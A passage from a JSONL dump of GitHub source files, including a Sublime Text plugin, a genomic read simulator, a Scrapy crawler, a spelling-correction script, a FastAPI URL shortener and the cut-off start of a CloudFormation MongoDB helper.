intersection = (\n (xp + eps >= trygrid[\"xlow\"])\n & (xp - eps <= trygrid[\"xupper\"])\n & (yp + eps >= trygrid[\"ylow\"])\n & (yp - eps <= trygrid[\"yupper\"])\n )\n\n if intersection:\n grid = copy.copy(trygrid)\n break\n try:\n xlow = grid[\"xlow\"]\n ylow = grid[\"ylow\"]\n yhi = grid[\"yupper\"]\n xhi = grid[\"xupper\"]\n dx = grid[\"dx\"]\n dy = grid[\"dy\"]\n mx = grid[\"mx\"]\n my = grid[\"my\"]\n data = grid[\"data\"]\n level = grid[\"AMR_level\"]\n except KeyError:\n\n print((\"point is possibly on amr grid edge: x= %s y=%s\" % (point)))\n domain = (\n griddict[\"xlowdomain\"],\n griddict[\"xhidomain\"],\n griddict[\"ylowdomain\"],\n griddict[\"yhidomain\"],\n )\n print((\"Domain xlow,xhi,ylow,yhi: [%s , %s] , [%s , %s]\" % (domain)))\n print((\"intersection? %s\" % (intersection)))\n print(\"quitting in protest.\")\n\n raise SystemExit(0)\n\n # actual i,j values for a given grid (note: this is not the row in data array)\n i1 = int(np.floor((xp - xlow) / dx)) + 1\n i2 = int(np.ceil((xp - xlow) / dx)) + 1\n j1 = int(np.floor((yp - ylow) / dy)) + 1\n j2 = int(np.ceil((yp - ylow) / dy)) + 1\n\n # catch small rounding errors in case point is very close to grid edge\n i1 = max(i1, 1)\n i1 = min(i1, mx)\n i2 = max(i2, 1)\n i2 = min(i2, mx)\n j1 = max(j1, 1)\n j1 = min(j1, my)\n j2 = max(j2, 1)\n j2 = min(j2, my)\n\n # x and y values of the four surrounding points in the grid\n # KRB note: I think these are the lower left corners of the cell.\n # all need increasing by 1/2 dx or dy. # does this mean that all the\n # topo writers (non-gtif) would then need adjusting... Since they all\n # assume that x and y are the lower left corners of the grid cell in\n # question.\n xl = xlow + (i1 - 1) * dx + (dx/2)\n xr = xl + dx + (dx/2)\n yl = ylow + (j1 - 1) * dy+ (dy/2)\n yu = yl + dy+ (dy/2)\n\n # indices into the data array\n ijll = (j1 - 1) * mx + i1\n ijlr = (j1 - 1) * mx + i2\n ijul = (j2 - 1) * mx + i1\n ijur = (j2 - 1) * mx + i2\n\n # solution vector at the four corners surrounding (xp,yp)\n qll = data[ijll - 1, :]\n qlr = data[ijlr - 1, :]\n qul = data[ijul - 1, :]\n qur = data[ijur - 1, :]\n\n # bilinear interpolation to (xp,yp)\n if bilinear:\n q = (\n qll * (xr - xp) * (yu - yp)\n + qlr * (xp - xl) * (yu - yp)\n + qul * (xr - xp) * (yp - yl)\n + qur * (xp - xl) * (yp - yl)\n )\n q = q / (dx * dy)\n else:\n # don't interpolate, instead, take the native grid resolution\n # value. Choose whichever of ll, lr, ul, lr is closest based on\n # the relative areas is bigger. https://en.wikipedia.org/wiki/Bilinear_interpolation\n\n all = (xr - xp) * (yu - yp)\n alr = (xp - xl) * (yu - yp)\n aul = (xr - xp) * (yp - yl)\n aur = (xp - xl) * (yp - yl)\n\n maxa = max((all, alr, aur, aul))\n\n if all == maxa:\n q = qll\n elif alr == maxa:\n q = qlr\n elif aul == maxa:\n q = qul\n else:\n q = qur\n\n return q, level\n\n\n# ===============================================================================\ndef intersection(rectangle1, rectangle2):\n \"\"\"\n return True of False if rectangle1 and rectangle2 intersect\n Note: rectangles may be single points as well, with xupper=xlower etc.\n arguments:\n rectangleX: list [xlower,ylower,xupper,yupper]\n\n\n \"\"\"\n xl1 = rectangle1[0]\n yl1 = rectangle1[1]\n xu1 = rectangle1[2]\n yu1 = rectangle1[3]\n\n xl2 = rectangle2[0]\n yl2 = rectangle2[1]\n xu2 = rectangle2[2]\n yu2 = rectangle2[3]\n\n nonintersection = (xl1 > xu2) | (xl2 > xu1) | (yl1 > yu2) | (yl2 > yu1)\n intersection = not nonintersection\n\n return intersection\n","repo_name":"geoflows/D-Claw","sub_path":"python/dclaw/fortconvert.py","file_name":"fortconvert.py","file_ext":"py","file_size_in_byte":46700,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"81"} +{"seq_id":"16449045608","text":"import os\nimport re\nimport sublime\nimport sublime_plugin\n\nVERSION = int(sublime.version())\nIS_ST3 = VERSION >= 3006\nCUR_ITER_ORDER = 1\n\ndef _ignore_file(filename, ignore_patterns=None):\n ignore_patterns = ignore_patterns or []\n ignore = False\n directory, base = os.path.split(filename)\n for pattern in ignore_patterns:\n if re.match(pattern, base):\n return True\n\n if len(directory) > 0:\n ignore = _ignore_file(directory, ignore_patterns)\n\n return ignore\n\ndef _list_path_file(path, ignore_patterns=None):\n ignore_patterns = ignore_patterns or []\n file_list = []\n if not os.path.exists(path):\n sMsg = \"{0} is not exist or can't visited!\".format(path)\n sublime.error_message(sMsg)\n raise ValueError(sMsg)\n\n for file in os.listdir(path):\n if not _ignore_file(file, ignore_patterns):\n file_list.append(file)\n\n return sorted(file_list)\n\nclass TraverseCurrentDirCommand(sublime_plugin.TextCommand):\n def __init__(self, args):\n sublime_plugin.TextCommand.__init__(self, args)\n self.quick_panel_files = None\n self.settings = None\n self.curName = None\n self.ignore_patterns = None\n self.path = None\n self.path_objs = None\n self.quick_panel_files = None\n\n def run(self, edit):\n self.settings = sublime.load_settings(\"ListCurrentDir.sublime-settings\")\n current = os.path.abspath(self.view.file_name())\n self.curName = os.path.basename(current)\n\n self.ignore_patterns = self.settings.get(\"ignore_patterns\", [r'.*?\\.tags'])\n self.show_dir_file(os.path.dirname(current))\n\n @classmethod\n def get_parent_path(cls, path):\n path = path.strip('/')\n parentPath = os.path.dirname(path)\n return parentPath\n\n def show_dir_file(self, path):\n self.path = path\n\n if self.quick_panel_files is not None and self.curName in self.quick_panel_files:\n index = self.quick_panel_files.index(self.curName) + CUR_ITER_ORDER\n else:\n index = -1\n\n self.build_quick_panel_file_list()\n\n if index >= len(self.quick_panel_files) or index <= 1:\n if CUR_ITER_ORDER == 1:\n index = 2\n else:\n index = len(self.quick_panel_files) - 1\n\n self.show_quick_panel(self.quick_panel_files, self.path_file_callback, index)\n\n def build_quick_panel_file_list(self):\n self.path_objs = {}\n self.quick_panel_files = []\n if CUR_ITER_ORDER == 1:\n self.quick_panel_files.append(\"/* change iter order to prev */\")\n else:\n self.quick_panel_files.append(\"/* change iter order to next */\")\n\n if os.path.exists(self.get_parent_path(self.path)):\n self.quick_panel_files.append(\"..\")\n\n files_list = _list_path_file(self.path, self.ignore_patterns)\n dirs = []\n files = []\n for file in files_list:\n if os.path.isfile(os.path.join(self.path, file)):\n files.append(file)\n else:\n dirs.append(file + '/')\n\n self.quick_panel_files += dirs\n self.quick_panel_files += files\n\n @staticmethod\n def is_file(entry):\n return not entry.endswith('/')\n\n def path_file_callback(self, index):\n global CUR_ITER_ORDER\n if index == -1:\n return\n\n entry = self.quick_panel_files[index]\n\n if entry == \"..\":\n self.curName = None\n self.show_dir_file(self.get_parent_path(self.path))\n return\n elif entry == \"/* change iter order to prev */\":\n CUR_ITER_ORDER = -1\n return\n elif entry == \"/* change iter order to next */\":\n CUR_ITER_ORDER = 1\n return\n else:\n target = os.path.join(self.path, entry)\n if self.is_file(entry):\n self.view.window().open_file(target)\n else:\n self.show_dir_file(target)\n\n def show_quick_panel(self, options, done_callback, index=None):\n if index is None or not IS_ST3:\n sublime.set_timeout(\n lambda: self.view.window().show_quick_panel(options, done_callback),\n 10)\n else:\n sublime.set_timeout(\n lambda: self.view.window().show_quick_panel(\n options, done_callback, selected_index=index),\n 10)\n","repo_name":"iamstorm/SublimeStorm-Traverse_Current_Directory","sub_path":"cmd_traverse_current_dir.py","file_name":"cmd_traverse_current_dir.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32012879717","text":"\"\"\"\nzot spikein - spike in variants\n\nUsage:\n zot spikein [options] <output-prefix> [<variant>...]\n\nOptions:\n -b BEDFILE restrict sampling of reads to regions in the BED file\n -d DEVIATION standard deviation of insert sizes (proportion of mean) [default: 0.1]\n -e RATE error rate [default: 0.005]\n -f FILE read variants from a file\n -g DIR directory containing reference sequences [default: .]\n -I SIZE insert size [default: 300]\n -l FILE log file for introduced mutations\n -L LENGTH read length [default: 100]\n -m FILE read a file containing <probability, variant> pairs, one per line to introduce stochastically\n -M PROB introduce extra substitution mutations around the variants with the given per-base probability\n -N NUMBER number of read pairs [default: 1000000]\n -S SEED random number generator seed\n -z gzip the output\n -v produce verbose progress messages\n -V VAF variant allele frequency [default: 1.0]\n\nVariants are spiked in right-to-left from the command line or reverse order when read from a file.\nThere is no compensation for position in the application of the variants, so they should be specified\nin position order, and overlapping variants won't work.\n\"\"\"\n\nimport math\nimport os.path\nimport random\nimport sys\n\nimport docopt\nfrom tqdm import tqdm\n\nfrom zotmer.library.file import openFile, readFasta, readFastq\nfrom zotmer.library.misc import uniq\nfrom zotmer.library.hgvs import hg19ToRefSeq, makeHGVS, refSeq2Hg19, Substitution\nfrom zotmer.library.rope import rope\n\ndef normalizeAccession(acc):\n if acc in refSeq2Hg19:\n acc = refSeq2Hg19[acc]\n if not acc.startswith('chr'):\n acc = 'chr' + acc\n return acc\n\nclass SequenceFactory(object):\n def __init__(self, home):\n self.home = home\n self.prevAcc = None\n self.prevSeq = None\n\n def __getitem__(self, acc):\n if acc != self.prevAcc:\n acc = normalizeAccession(acc)\n pth = self.home + '/' + acc + '.fa'\n if not os.path.exists(pth):\n pth = pth + '.gz'\n with openFile(pth) as f:\n for (nm,seq) in readFasta(f):\n self.prevAcc = acc\n self.prevSeq = seq\n break\n return self.prevSeq\n\nclass MultiGen(object):\n def __init__(self, pcs):\n self.cum = []\n t = 0.0\n for (p,v) in pcs:\n t += p\n self.cum.append((t, v))\n\n def gen(self):\n u = random.random()\n l = 0\n h = len(self.cum)\n while l < h:\n m = (l + h) // 2\n if u < self.cum[m][0]:\n h = m\n else:\n l = m + 1\n return self.cum[l][1]\n\nclass GeomVarSource(object):\n def __init__(self, p):\n self.p = p\n self.l1mp = None\n if p > 0:\n self.l1mp = math.log1p(-p)\n\n def __call__(self):\n if self.p == 0:\n return 0\n return int(math.log(random.random()) / self.l1mp)\n\n def make(self, lo, hi):\n if self.p == 0:\n return []\n r = []\n j = lo\n i = 0\n while True:\n j += i + self()\n if j >= hi:\n break\n i = 1\n r.append(j)\n return r\n\nrcDict = {'A':'T', 'C':'G', 'G':'C', 'T':'A'}\n\ndef revComp(s):\n r = []\n for c in s:\n r.append(rcDict.get(c, c))\n return ''.join(r[::-1])\n\naltDict = {}\naltDict['A'] = ['C', 'G', 'T']\naltDict['C'] = ['A', 'G', 'T']\naltDict['G'] = ['A', 'C', 'T']\naltDict['T'] = ['A', 'C', 'G']\n\nbases = ['A', 'C', 'G', 'T']\n\ndef mutate(egen, seq):\n ps = egen.make(0, len(seq))\n\n seq = seq.upper()\n\n if len(ps) == 0:\n return (seq, [])\n\n r = [seq[i] for i in range(len(seq))]\n e = []\n for p in ps:\n c = r[p]\n d = random.choice(altDict.get(c, bases))\n e.append('%d%s>%s' % (p, c, d))\n r[p] = d\n return (''.join(r), e)\n\ndef readBED(f):\n res = {}\n first = True\n for l in f:\n t = l.split()\n if first:\n first = False\n if t[0] == 'track' or t[0] =='browser':\n continue\n ch = normalizeAccession(t[0])\n s = int(t[1])\n e = int(t[2])\n n = None\n if len(t) > 3:\n n = t[3]\n v = (s, e, n)\n if ch not in res:\n res[ch] = []\n res[ch].append(v)\n for ch in res.keys():\n res[ch].sort()\n return res\n\ndef applyBackgroundVariants(ch, given, popVars):\n if len(popVars) == 0:\n return given\n if ch not in popVars:\n return given\n\n extra = []\n for (m,p) in popVars[ch]:\n if p < random.random():\n continue\n if len(extra) and extra[-1].overlaps(m):\n continue\n ok = True\n for v in given:\n if v.overlaps(m):\n ok = False\n break\n if ok:\n extra.append(m)\n allOfThem = given + extra\n allOfThem.sort()\n return allOfThem\n\ndef between(st, en, v):\n \"\"\"test if a variant lies within a range\"\"\"\n r = v.range()\n return all([st <= r[0], r[0] <= en, st <= r[1], r[1] <= en])\n\ndef overlaps(st, en, v):\n \"\"\"test if a variant lies within a range\"\"\"\n r = v.range()\n if st <= r[0] and r[0] <= en:\n return True\n if st <= r[1] and r[1] <= en:\n return True\n if r[0] <= st and st <= r[1]:\n return True\n if r[0] <= en and en <= r[1]:\n return True\n return False\n\nclass ReadMaker(object):\n def __init__(self, **kwargs):\n # Chromosome and Region of interest\n #\n self.chrom = kwargs['chrom']\n self.zone = kwargs['zone']\n\n # Read Length\n #\n self.L = kwargs['L']\n\n # Insert Size\n #\n self.I = kwargs['I']\n\n # Fragment relative std-dev (as a faction of insert size)\n #\n self.D = kwargs['D']\n\n # List of *chromosome* variants\n #\n self.variants = kwargs['variants']\n\n # Fasta or Fastq?\n #\n self.fasta = kwargs['fasta']\n\n self.seqFac = kwargs['sf']\n self.egen = kwargs['egen']\n\n def prepareAllele(self):\n (st, en, nm) = self.zone\n\n # Select the variants that lie within this range.\n #\n ws = [v for v in self.variants if overlaps(st, en, v)]\n ws.sort(reverse=True)\n\n seq = self.seqFac[self.chrom]\n G = len(seq)\n\n s0 = st\n e0 = en\n seq = rope.atom(seq)\n\n for v in ws:\n r = v.range()\n l = r[1] - r[0]\n e0 -= l\n e0 += v.size()\n seq = v.apply(seq)\n\n self.seq = seq\n self.sourceRange = (s0, e0)\n self.quals = 'I' * self.L\n\n def makeReadFromZone(self):\n G = len(self.seq)\n\n (s0, e0) = self.sourceRange\n\n u = random.randint(s0, e0)\n\n fl = int(random.gauss(self.I, self.I*self.D))\n fl = max(fl, self.L + self.L // 2)\n\n if u - fl < 0:\n u = fl\n if u + fl > G:\n u = G - fl\n\n assert 0 <= u and u + fl <= G\n\n frag = self.seq[u:u+fl]\n\n if random.random() < 0.5:\n s = '+'\n else:\n s = '-'\n frag = revComp(frag)\n\n r1 = frag[:self.L]\n r2 = frag[-self.L:]\n\n (r1, e1) = mutate(self.egen, r1)\n (r2, e2) = mutate(self.egen, r2)\n\n ch = self.chrom\n (st, en, nm) = self.zone\n out1 = []\n out2 = []\n if self.fasta:\n out1 += ['>' + ' '.join([ch, str(st), str(en), nm, str(u), str(fl), s] + e1)]\n out1 += [r1]\n\n out2 += ['>' + ' '.join([ch, str(st), str(en), nm, str(u), str(fl), s] + e2)]\n out2 += [r2]\n else:\n out1 += ['@%s:%d-%d %s %d %d %s %s' % (ch, st, en, nm, u, fl, s, ';'.join(e1))]\n out1 += [r1]\n out1 += ['+']\n out1 += [self.quals]\n out2 += ['@%s:%d-%d %s %d %d %s %s' % (ch, st, en, nm, u, fl, s, ';'.join(e2))]\n out2 += [r2]\n out2 += ['+']\n out2 += [self.quals]\n return ('\\n'.join(out1), '\\n'.join(out2))\n\ndef main(argv):\n opts = docopt.docopt(__doc__, argv)\n\n sf = SequenceFactory(opts['-g'])\n\n I = int(opts['-I'])\n D = float(opts['-d'])\n E = float(opts['-e'])\n L = int(opts['-L'])\n N = int(opts['-N'])\n V = float(opts['-V'])\n\n M = None\n if opts['-M'] is not None:\n M = float(opts['-M'])\n # compute the 99% quantile\n W = int(math.log1p(-0.99)/math.log1p(-M))\n\n S = None\n if opts['-S'] is not None:\n S = int(opts['-S'])\n random.seed(S)\n\n if opts['-b']:\n zones = readBED(openFile(opts['-b']))\n else:\n zones = {}\n for ch in refSeq2Hg19.values():\n ch = normalizeAccession(ch)\n s = sf[ch]\n v = (1, len(s), ch)\n if ch not in zones:\n zones[ch] = []\n zones[ch].append(v)\n\n popVars = {}\n if opts['-m'] is not None:\n with openFile(opts['-m']) as f:\n for l in f:\n t = l.split()\n p = float(t[0])\n v = makeHGVS(t[1], sf)\n a = normalizeAccession(v.accession())\n if a not in popVars:\n popVars[a] = []\n popVars[a].append((v,p))\n for ch in popVars.keys():\n popVars[ch].sort()\n\n t = 0\n chMax = 0\n for ch in zones.keys():\n chMax = max(chMax, len(ch))\n for zone in zones[ch]:\n (s, e, _n) = zone\n l = e - s + 1\n t += l\n\n if opts['-v']:\n print >> sys.stderr, 'mean coverage = %g' % (float(N*L)/float(t),)\n\n zoneCounts = {}\n zoneProbs = []\n for ch in zones.keys():\n zoneCounts[ch] = {}\n for zone in zones[ch]:\n zoneCounts[ch][zone] = 0\n (s, e, _n) = zone\n l = e - s + 1\n zoneProbs.append((float(l)/float(t), (ch, zone)))\n zgen = MultiGen(zoneProbs)\n for n in xrange(N):\n (ch,z) = zgen.gen()\n if z not in zoneCounts[ch]:\n zoneCounts[ch][z] = 0\n zoneCounts[ch][z] += 1\n\n vStrs = opts['<variant>']\n if opts['-f'] is not None:\n with openFile(opts['-f']) as f:\n for l in f:\n s = l.strip()\n vStrs.append(s)\n\n allVars = {}\n for s in vStrs:\n v = makeHGVS(s, sf)\n if v is None:\n print >> sys.stderr, 'unable to parse variant: %s', (s, )\n continue\n if v.anonymous():\n n = v.size()\n seq = ''.join([random.choice(['A', 'C', 'G', 'T']) for i in range(n)])\n v.setSequence(seq)\n a = normalizeAccession(v.accession())\n if a not in allVars:\n allVars[a] = []\n allVars[a].append(v)\n\n numOverlaps = 0\n for xs in allVars.values():\n xs.sort()\n for i in range(len(xs)):\n for j in range(i + 1, len(xs)):\n if xs[i].overlaps(xs[j]):\n print >> sys.stderr, \"variants overlap: %s <> %s\" % (str(xs[i]), str(xs[j]))\n numOverlaps += 1\n if numOverlaps > 0:\n sys.exit(1)\n\n prog = None\n if opts['-v']:\n prog = tqdm(total = N, unit='pairs')\n\n egen = GeomVarSource(E)\n\n fasta = False\n\n logfile = None\n if opts['-l']:\n logfile = open(opts['-l'], 'w')\n\n pfx = opts['<output-prefix>']\n sfx = ''\n if opts['-z']:\n sfx = '.gz'\n with openFile(pfx + '_1.fastq' + sfx, 'w') as out1, openFile(pfx + '_2.fastq' + sfx, 'w') as out2:\n for ch in zones.keys():\n if prog is not None:\n prog.set_description(ch.ljust(chMax, ' '))\n prog.update(0)\n chVars = []\n if ch in allVars:\n chVars = allVars[ch]\n\n wtVars = applyBackgroundVariants(ch, [], popVars)\n mutVars = applyBackgroundVariants(ch, chVars, popVars)\n\n for zone in zones[ch]:\n wtMaker = ReadMaker(chrom=ch, zone=zone, L=L, I=I, D=D, variants=wtVars, fasta=fasta, egen=egen, sf=sf)\n wtMaker.prepareAllele()\n\n mutMaker = ReadMaker(chrom=ch, zone=zone, L=L, I=I, D=D, variants=mutVars, fasta=fasta, egen=egen, sf=sf)\n mutMaker.prepareAllele()\n\n for i in xrange(zoneCounts[ch][zone]) :\n if prog is not None:\n prog.update(1)\n u = random.random()\n if u > V:\n (rd1,rd2) = wtMaker.makeReadFromZone()\n else:\n (rd1,rd2) = mutMaker.makeReadFromZone()\n print >> out1, rd1\n print >> out2, rd2\n\n if prog is not None:\n prog.__exit__(None, None, None)\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n\n","repo_name":"drtconway/zotmer","sub_path":"zotmer/commands/spikein.py","file_name":"spikein.py","file_ext":"py","file_size_in_byte":13023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35597221493","text":"import os\nimport time\nfrom multiprocessing import Process, Value\nfrom pathlib import Path\nfrom shutil import rmtree\nimport shutil\n\nfrom tqdm.auto import tqdm\nfrom tool.files import *\nfrom tool.videos import *\n\ndef extract():\n os.system(\"python extractFrames.py\")\n\ndef generate():\n os.system(\"python genMultimodal.py\")\n\ninputFolder = \"inputFolder\"\ninputVideos = \"inputVideos\"\noutputFolder =\"output\"\nos.system(\"python clean.py\")\n\n\ninputFolders = onlyfolders(inputFolder)\nprint(\"Found input folders: \", inputFolders)\n\nfor folder in inputFolders:\n files = onlyfiles(folder)\n print(\"Found %i files in %s folder\"%(len(files), folder.split(os.sep)[-1]))\n for file in files:\n shutil.move(file, inputVideos + os.sep + file.split(os.sep)[-1])\n removeAllFiles(folder)\n extractor = Process(target= extract)\n extractor.start()\n generator = Process(target = generate)\n generator.start()\n generator.join()\n # move output files back into same folder structure as input (in finalOutput)\n try:\n os.mkdir(\"finalOutput\")\n except:\n pass\n try:\n os.mkdir(\"finalOutput\" + os.sep + folder.split(os.sep)[-1])\n except:\n pass\n outputs = onlyfiles(outputFolder)\n for o in outputs:\n print(o, \"finalOutput\"+ os.sep + o.split(os.sep)[-1] )\n shutil.move(o, \"finalOutput\"+ os.sep + folder.split(os.sep)[-1] + os.sep + o.split(os.sep)[-1] )\n","repo_name":"UoA-CARES/multimodal-data-pipeline","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11261953491","text":"import scrapy\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom urllib.parse import urlparse\nimport hashlib\nimport json\n\n\nclass MainSpider(CrawlSpider):\n name = \"main\"\n\n rules = (Rule(LinkExtractor(), callback=\"parse_item\", follow=True),)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n with open(self.domains_file, \"r\") as f:\n self.start_urls = f.read().split(\"\\n\")\n self.allowed_domains = [urlparse(url).netloc for url in self.start_urls]\n\n def parse_start_url(self, response):\n return self.parse_item(response)\n\n def parse_item(self, response):\n try:\n body_decoded = response.body.decode()\n except UnicodeDecodeError:\n body_decoded = \"<binary>\"\n\n headers = []\n for name, values in response.headers.items():\n for value in values:\n headers.append({\"name\": name.decode(), \"value\": value.decode()})\n\n item = dict(\n status=response.status,\n url=response.url,\n domain_name=urlparse(response.url).netloc,\n body=body_decoded,\n response_size=len(response.body),\n headers=headers,\n )\n yield item\n","repo_name":"cisagov/crossfeed","sub_path":"backend/worker/webscraper/webscraper/spiders/main_spider.py","file_name":"main_spider.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":323,"dataset":"github-code","pt":"81"} +{"seq_id":"38244757160","text":"import jellyfish\nimport time\n\nfile = open(\"misspell.txt\", 'r')\nmis = file.readlines()\nfile.close()\n\nfile = open(\"correct.txt\", 'r')\ncor = file.readlines()\nfile.close()\n\nfile = open(\"dict.txt\", 'r')\ndic = file.readlines()\nfile.close()\n\nnum = 0\ncorrectnum = 0\n\nwriteTXT = open(\"Metaphone.txt\", \"w\")\n\ndictionary = []\nfor line in dic:\n temp = line.strip()\n dictionary.append(temp)\n\ncorrect = []\nfor line in cor:\n temp = line.strip()\n correct.append(temp)\n\nmisspell = []\nfor line in mis:\n temp = line.strip()\n misspell.append(temp)\n\ntime_start = time.time()\n\nmetacodes = []\nfor dicWord in dictionary:\n metacode = jellyfish.metaphone(dicWord)\n metacodes.append(metacode)\n\nfor line in range(0, len(misspell)):\n current = misspell[line]\n prediction = []\n result = []\n metacode = jellyfish.metaphone(current)\n\n for meta in range(0,len(metacodes)):\n if metacode == metacodes[meta]:\n prediction.append(dictionary[meta])\n num += 1\n\n if correct[line] in prediction:\n correctnum += 1\n result.append(\"T\")\n else:\n result.append(\"F\")\n\n writeTXT.write(current + ',' + metacode + ',' + str(prediction) + ',' + str(result) + '\\n')\n\ntime_end = time.time()\n\nruntime = time_end - time_start\n\npricision = (float(correctnum) / float(num)) * 100\nrecall = (float(correctnum) / float(10322)) * 100\n\nprint(correctnum, num, pricision, recall)\nprint(str(runtime))\nwriteTXT.write(\"correctnum = \" + str(correctnum) + '\\n' + \"totalnum = \" + str(num) + '\\n' + \"pricision = \" + str(\n pricision) + '\\n' + \"recall = \" + str(recall) + \"\\n\" + \"runtime = \" + str(runtime))\n\nwriteTXT.close()\n","repo_name":"ASCII-768977/GlobalDistance-Metaphone-nGram-Soundex","sub_path":"code/metaphone.py","file_name":"metaphone.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73862719946","text":"import fastapi\nfrom fastapi import security\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.responses import Response\n\nfrom api.complaint import ComplaintRouter\nfrom api.link import LinkRouter\nfrom api.user import UserRouter\nfrom settings import settings\n\napp = fastapi.FastAPI(\n title=\"URL Shortener\",\n description=\"A URL shortening service with more features\",\n version=\"0.1.0\",\n license_info={\n \"name\": \"MIT\",\n },\n)\n\noauth2_scheme = security.OAuth2PasswordBearer(tokenUrl=\"token\")\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=settings.allow_origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\n@app.get(\"/\")\nasync def healthcheck():\n return Response(\"OK\")\n\n\napp.include_router(UserRouter)\napp.include_router(LinkRouter)\napp.include_router(ComplaintRouter)\n","repo_name":"Krishap-s/url-shortener","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24029306811","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"match_sim-ckear\",\n author=\"Conor Kearney\",\n author_email=\"ckear@example.com\",\n description=\"A small example package\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/ckear/match_sim\",\n packages=setuptools.find_packages(),\n package_data={\n 'match_sim': ['data/defaults/*.txt', 'data/formations/*.txt', 'data/settings/*.json'],\n },\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires=\">=2.7\",\n extras_require={\n \"run\": [\n ],\n \"dev\": [\n \"pyfiglet>=0.8\",\n \"progressbar>=2.5\",\n \"numpy>=1.16.6\",\n \"tqdm>=4.46.1\",\n \"prettytable>=0.7.2\",\n \"names>=0.3.0\",\n \"python-dateutil>=2.8.1\",\n \"barnum>=0.5.1\",\n \"dill>=0.3.1.1\",\n \"wxPython>=4.1.0\",\n \"pytest>=3.5\",\n ],\n \"gen_tests\": [\n ] \n },\n use_scm_version=True,\n setup_requires=[\"setuptools_scm\"],\n)\n","repo_name":"ckear1989/match_sim","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"815195923","text":"from claseEmail import Email\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\"Ingrese datos\")\r\n id = input(\" ingrese id cuenta: \")\r\n dominio = input(\" ingrese dominio: \")\r\n tipodom = input(\" ingrese el tipo de dominio: \")\r\n contraseña = input(\" ingrese la contraseña: \")\r\n unemail = Email(id, dominio, tipodom, contraseña)\r\n unemail.retornaEmail()\r\n unemail.getdominio()\r\n\r\n direccion = input(\" ingrese direccion correo: \")\r\n mail = Email(0, 0, 0, 0)\r\n mail.crearcuenta(direccion)\r\n mail.retornaEmail()\r\n\r\n nombre = input(\"ingrese nombre:\")\r\n email = input(\"ingrese email\")\r\n print(f\"Estimado {nombre} te enviaremos tus mensajes a la direccion {email}\")\r\n contra = input(\" ingrese la contraseña actual: \")\r\n# mail.modificarcontrasenia(contra)\r\n","repo_name":"BALTAR1/Poo-Facultad","sub_path":"Unidad2/python ejer 1 unidad 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2453790507","text":"from troposphere import Ref,Sub,Base64, Template, Output, GetAtt, ImportValue, Export, ec2, Tags, route53\nfrom troposphere.events import Rule, Target\nfrom troposphere.cloudformation import WaitCondition, WaitConditionHandle\nfrom troposphere.sns import Subscription\nfrom troposphere import awslambda\nfrom functools import partial\nimport argparse\nimport boto3\nimport json\nimport sys\nfrom . import iam as create_iam\nfrom . import custom_funcs\nfrom . import tcpstacks\nimport awacs\nimport awacs.logs as logs\nimport create.network\nfrom create import export_ref, import_ref\n\n\ndef mongo_userdata(db_type, db_name, ops, app_cfn_options, db_ips, userdata_file):\n\n cf_param_refs = {k:v for k,v in app_cfn_options.cf_params.items()}\n userdata_vars = {k:ops.get(v) for k,v in ops.userdata_exports.items()}\n userdata_vars.update(cf_param_refs)\n userdata_vars.update(dict( LOG_GROUP = app_cfn_options.log_group,\n resource_name = db_name))\n userdata_vars.update(dict( MONGO_TYPE = db_type))\n userdata_vars.update(db_ips)\n userdata_1 = create.ec2.multipart_userdata(\n bash_files = [userdata_file],\n install_packages = [\"docker\"],\n sub_values = userdata_vars,\n ip_list = db_ips,\n )\n return userdata_1\n\ndef add_instances(template, ops, app_cfn_options, db_name, db_type, instance_type, db_ips, userdata_file, az, previous_instance, fs_mounts):\n subnet = app_cfn_options.mongo_subnets[az]\n iam_profile = ImportValue(app_cfn_options.resource_names['ec2_iam_profile'])\n\n ebs_volume = ec2.EBSBlockDevice( VolumeSize = \"100\", Encrypted = False, VolumeType = \"gp2\", DeleteOnTermination = True)\n bdm = ec2.BlockDeviceMapping( DeviceName = '/dev/sdf', Ebs = ebs_volume)\n ec2_instance_func = partial(\n ec2.Instance,\n db_name,\n ImageId = ops.ami_image,\n InstanceType = instance_type, #TODO: config option\n KeyName = app_cfn_options.cf_params.get('KeyName'),\n SubnetId = subnet,\n AvailabilityZone = ops.availability_zones[az],\n IamInstanceProfile = iam_profile,\n Tags = Tags(\n Name = db_name,\n Env = ops.deploy_env,\n BillingID = ops.billing_id\n ),\n BlockDeviceMappings = [bdm],\n SecurityGroupIds = [GetAtt(app_cfn_options.mongo_sg_name,\"GroupId\")],\n UserData = mongo_userdata(db_type, db_name, ops, app_cfn_options, db_ips, userdata_file),\n )\n if previous_instance:\n instance = 